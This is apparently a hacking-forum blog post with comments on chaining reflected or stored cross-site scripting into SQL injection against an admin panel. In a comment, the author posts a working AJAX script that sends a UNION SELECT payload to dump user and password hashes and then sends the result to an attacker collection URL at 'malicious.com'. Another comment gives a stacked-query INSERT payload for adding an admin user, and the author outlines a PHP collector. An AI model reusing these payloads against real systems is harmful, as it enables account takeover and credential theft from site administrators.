• SQL Injection Via XSS

    One of the G4H member mandi from Garage4hackers Forums - Home (my second home) asked few days before about xsssqli attack. He had a scenario where the main site is having a cross-site scripting vulnerability and the admin panel has SQL Injection. The page having sql injection in admin panel is only accessible to admin. The question was is it possible to use xss on main site to exploit sql injection on admin panel to get admin account pwned?

    Here is my answer with following scenario:

    There is a main site which is vulnerable to xss flaw (reflected/stored). The same site has a admin panel which is only accessible to admin users and one of the authenticated pages is vulnerable to sql injection. the admin panel can be a separate package like cpanel and the sql injection vulnerability will be already published (exploit-db FTW!!!).

    This is how we can pwn admin account using sql injection via xss.
    1. Attacker crafts a xss payload which is using AJAX to make a request with sql injection payload.
    2. He sends the payload to admin user.
    3. When admin user is logged in into admin panel and clicks the payload link from attacker, the sql injection in admin page is exploited and returns the username & password hashes from admin table.
    4. Attacker then submit the returned data to his site using Ajax and will crack password hashes offline.

    Video Demonstration:


    Any suggestions, comments are welcome.

    AMol NAik
    This article was originally published in blog: SQL Injection Via XSS started by amolnaik4
    Comments 5 Comments
    1. 41.w4r10r's Avatar
      41.w4r10r -
      hey amol how about sharing your ajax script...
      also can we include few more attack vector in this script as we already know that we can use INSERT query and insert an admin user instead of making a long process of cracking hash...
    1. amolnaik4's Avatar
      amolnaik4 -
      hey 41.w4r10r,

      Here is the ajax script used in video:
      Code:
      var url="http://mysite.com/admin/index.php?page=vuln&id=1'+UNION+ALL+SELECT+user,password+from+users-- -"
      
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.open("GET",url,true);
      
      xmlhttp.onreadystatechange=function(){
      	if(xmlhttp.readyState == 4 && xmlhttp.status == 200){
      		sendtoattacker(xmlhttp.responseText);
      	}
      }
      
      xmlhttp.send();
      
      function sendtoattacker(data){
      	var myurl = "http://malicious.com/collect.php?log="+data;
      	var xhr = new XMLHttpRequest();
      	xhr.open("GET",myurl,true);
      	xmlhttp.onreadystatechange=function(){
      	        if(xmlhttp.readyState == 4 && xmlhttp.status == 200){
      			alert("Pass2");
      		}
      	}
      	xhr.send();
      }
      Yes, we can include all SQLi attacks using this. Just need to change the ajax script accordingly.

      But with mysql-PHP, we can't use stacked SQL queries, so it;s not possible to use INSERT/UPDATE in this case:
      Code:
      http://mysite.com/admin/index.php?page=vuln&id=1';INSERT INTO users values('10','newadmin','newpass');-- -
      It can be possible on other platforms.

      AMol NAik
    1. Angel--D3m0n's Avatar
      Angel--D3m0n -
      please share all attachments (collect.php and user_pass.html) im w8ing..... TNX
    1. amolnaik4's Avatar
      amolnaik4 -
      Angel--D3m0n,

      'collect.php' is a simple file which gets input and write it into 'user-pass.html' file. I'll suggest you create one for yourself so that you will learn PHP as well.

      Here are few steps 'collect.php' should do:
      1. Collect input via GET parameter.
      2. Open a file for writing.
      3. Write collected content into the previously opened file.
      4. Close the file.

      Do some googling for syntax and examples. php.net is a gr8 source too.

      AMol NAik
    1. tush2050's Avatar
      tush2050 -
      Nic tut bhau , learned a lot from it
  • G4H Facebook

  • G4H Twitter